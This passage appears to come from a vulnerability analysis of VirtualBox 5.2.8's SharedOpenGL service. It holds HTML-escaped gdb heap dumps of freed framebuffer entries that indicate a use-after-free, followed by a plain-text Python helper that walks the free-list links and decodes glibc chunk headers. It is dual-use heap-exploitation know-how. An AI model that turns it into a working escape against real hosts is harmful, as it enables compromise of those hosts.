class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">fbCleanupRemoveAllEntries<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79d69aec0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">presenter<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">display_base<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">320<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-7\"><span class=\"crayon-cn\">320<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pEntry<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">CrVrScrCompositorConstIterNext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">Iter<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-8\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">pl<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-9\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4e80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-10\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4d00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-11\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0x7fb7ac0f4dc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-12\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4f40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-13\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4c40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-14\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">33<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4b80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-15\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5b7b3e582f514775088597-16\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4940<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-17\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4ac0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-18\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">pli<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-19\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">37<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4e80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-20\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">38<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-21\"><span 
class=\"crayon-cn\">0x7fb79d130260<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81460<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc71ef0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-22\"><span class=\"crayon-cn\">0x7fb79d130270<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-23\"><span class=\"crayon-cn\">0x7fb79d130280<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-24\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">39<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4d00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-25\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-26\"><span class=\"crayon-cn\">0x7fb79cc729f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d130250<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d06dd40<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-27\"><span class=\"crayon-cn\">0x7fb79cc72a00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-28\"><span class=\"crayon-cn\">0x7fb79cc72a10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-29\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4dc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-30\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-31\"><span class=\"crayon-cn\">0x7fb79cc81690<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc729e0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79e1d7c50<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-32\"><span class=\"crayon-cn\">0x7fb79cc816a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-33\"><span class=\"crayon-cn\">0x7fb79cc816b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-34\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4f40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-35\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">44<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-36\"><span class=\"crayon-cn\">0x7fb79d66a310<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81680<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81390<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-37\"><span class=\"crayon-cn\">0x7fb79d66a320<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-38\"><span class=\"crayon-cn\">0x7fb79d66a330<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-39\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">45<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4c40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-40\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">46<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-41\"><span class=\"crayon-cn\">0x7fb79cc67450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc7ba00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-42\"><span class=\"crayon-cn\">0x7fb79cc67460<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-43\"><span class=\"crayon-cn\">0x7fb79cc67470<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0003506100010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-44\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">47<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4b80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-45\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-46\"><span class=\"crayon-cn\">0x7fb79d12dc50<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d66a300<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12f080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-47\"><span class=\"crayon-cn\">0x7fb79d12dc60<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-48\"><span class=\"crayon-cn\">0x7fb79d12dc70<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-49\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">49<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0x7fb7ac0f4a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-50\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-51\"><span class=\"crayon-cn\">0x7fb79d66a2b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc67440<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12f330<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-52\"><span class=\"crayon-cn\">0x7fb79d66a2c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-53\"><span class=\"crayon-cn\">0x7fb79d66a2d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0003506f00010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-54\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">51<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4940<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-55\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-56\"><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12dc40<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-57\"><span class=\"crayon-cn\">0x7fb79cf983d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-58\"><span class=\"crayon-cn\">0x7fb79cf983e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-59\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4ac0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-60\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">54<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-61\"><span class=\"crayon-cn\">0x7fb79d0a7430<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cf983b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc814f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-62\"><span class=\"crayon-cn\">0x7fb79d0a7440<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-63\"><span class=\"crayon-cn\">0x7fb79d0a7450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0132 seconds] -->  <\/p>\n<p>We can see that the first qword of an entry (freed) is a pointer to a previous entry (also freed) minus 0x10, i.e. is a pointer to a malloc_chunk of a previous entry. 
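The free-list pattern noted above can be checked mechanically; the Python below is an added triage example (not code from the advisory or from VirtualBox) that parses the `pli` dump, follows each entry's first qword as a link to another dumped entry's chunk header, and compares the entry at 0x7fb79cf983c0 with the later `x/8gx $rax-0x10` dump taken at ConsoleVRDPServer.cpp:1994. It goes a little beyond the sentence above by showing that the nine freed entries form two separate chains rather than one, and which qwords of that entry changed between the two dumps. It assumes glibc's malloc_chunk layout (0x10 header, size flags in the low three bits) and that the first qword is a fastbin-style fd; the dump text is copied from the session above.

```python
"""Added triage helper for the gdb dumps above (example code, not the advisory's own)."""
from dataclasses import dataclass

CHUNK_HDR = 0x10  # glibc malloc_chunk header (prev_size, size) sits 0x10 before the user pointer

# The nine H3DORInstance dumps from the `pli` output above, copied from the session ($N lines dropped).
PLI_OUTPUT = """
0x7fb79d130260:\t0x00007fb79cc81460\t0x00007fb79cc71ef0
0x7fb79d130270:\t0x0000000000000000\t0x0000029b00000556
0x7fb79d130280:\t0x0000000000010101
0x7fb79cc729f0:\t0x00007fb79d130250\t0x00007fb79d06dd40
0x7fb79cc72a00:\t0x0000000000000000\t0x0000029b00000556
0x7fb79cc72a10:\t0x0000000000010101
0x7fb79cc81690:\t0x00007fb79cc729e0\t0x00007fb79e1d7c50
0x7fb79cc816a0:\t0x0000000000000000\t0x0000029b00000556
0x7fb79cc816b0:\t0x0000000000010101
0x7fb79d66a310:\t0x00007fb79cc81680\t0x00007fb79cc81390
0x7fb79d66a320:\t0x0000000000000000\t0x0000029b00000556
0x7fb79d66a330:\t0x0000000000010101
0x7fb79cc67450:\t0x0000000000000000\t0x00007fb79cc7ba00
0x7fb79cc67460:\t0x0000000000000000\t0x0000029b00000556
0x7fb79cc67470:\t0x0003506100010101
0x7fb79d12dc50:\t0x00007fb79d66a300\t0x00007fb79d12f080
0x7fb79d12dc60:\t0x0000000000000000\t0x0000029b00000556
0x7fb79d12dc70:\t0x0000000000010101
0x7fb79d66a2b0:\t0x00007fb79cc67440\t0x00007fb79d12f330
0x7fb79d66a2c0:\t0x0000000000000000\t0x0000029b00000556
0x7fb79d66a2d0:\t0x0003506f00010101
0x7fb79cf983c0:\t0x00007fb79d12dc40\t0x00007fb79cc81400
0x7fb79cf983d0:\t0x0000000000000000\t0x0000029b00000556
0x7fb79cf983e0:\t0x0000000000010101
0x7fb79d0a7430:\t0x00007fb79cf983b0\t0x00007fb79cc814f0
0x7fb79d0a7440:\t0x0000000000000000\t0x0000029b00000556
0x7fb79d0a7450:\t0x0000000000010101
"""
# `x/8gx $rax-0x10` taken at ConsoleVRDPServer.cpp:1994, also copied from the session.
AFTER_DUMP = """
0x7fb79cf983b0:\t0x0000000000000090\t0x0000000000000035
0x7fb79cf983c0:\t0x00007fb79d12dc40\t0x00007fb700000000
0x7fb79cf983d0:\t0x00007fb79cc7b8d0\t0x00007f0100000000
0x7fb79cf983e0:\t0x0000000000010101\t0x00000000000000e5
"""

@dataclass
class Dumped:
    addr: int     # address of the first qword shown
    qwords: list  # consecutive qwords read from addr upward

def parse_dump(text):
    """Parse gdb x/gx lines ("addr: qword [qword]"); a line whose address does not
    continue the previous object starts a new one. $N result lines are skipped."""
    objs = []
    for line in text.splitlines():
        tok = line.split()
        if not tok or tok[0].startswith("$"):
            continue
        addr, vals = int(tok[0].rstrip(":"), 16), [int(v, 16) for v in tok[1:]]
        if objs and addr == objs[-1].addr + 8 * len(objs[-1].qwords):
            objs[-1].qwords.extend(vals)
        else:
            objs.append(Dumped(addr, vals))
    return objs

def free_list_chains(objs):
    """Read qword 0 of each object as a fastbin-style fd: the header of another chunk,
    i.e. that object's user pointer minus 0x10 (the pattern the sentence above notes).
    Returns (chain, tail): the objects reached from each list head, and None if the last
    fd is NULL or the address at which the chain leaves the dump."""
    succ = {o.addr: (None if o.qwords[0] == 0 else o.qwords[0] + CHUNK_HDR) for o in objs}
    pointed_to = {s for s in succ.values() if s is not None}
    chains = []
    for head in [a for a in succ if a not in pointed_to]:
        chain, nxt = [head], succ[head]
        while nxt in succ and nxt not in chain:
            chain.append(nxt)
            nxt = succ[nxt]
        chains.append((chain, nxt))
    return chains

def chunk_header(dump):
    """Decode a dump that starts at the chunk header: glibc stores the chunk size in the
    second qword with PREV_INUSE / IS_MMAPPED / NON_MAIN_ARENA flags in its low three bits."""
    size_field = dump.qwords[1]
    return {"prev_size": dump.qwords[0], "size": size_field & ~0x7,
            "prev_inuse": bool(size_field & 1), "is_mmapped": bool(size_field & 2),
            "non_main_arena": bool(size_field & 4), "user_ptr": dump.addr + CHUNK_HDR,
            "qwords": dump.qwords[2:]}

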